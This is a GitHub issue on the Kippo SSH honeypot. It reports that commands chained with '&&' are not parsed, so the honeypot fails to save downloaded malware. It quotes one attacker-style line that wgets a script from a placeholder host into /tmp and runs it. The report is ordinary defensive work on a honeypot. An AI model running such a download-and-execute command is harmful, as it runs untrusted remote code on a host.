desaster / kippo

Kippo - SSH Honeypot
1.62k stars 277 forks source link

Failed to parse include "&&" in the command #152

Open mrtc0 opened 10 years ago

mrtc0 commented 10 years ago

For example, the case of a command such as the following is not parsed to wget, and fails to save malware.sh

cd /tmp && wget http://x.x.x.x/malware.sh && sh malware.sh"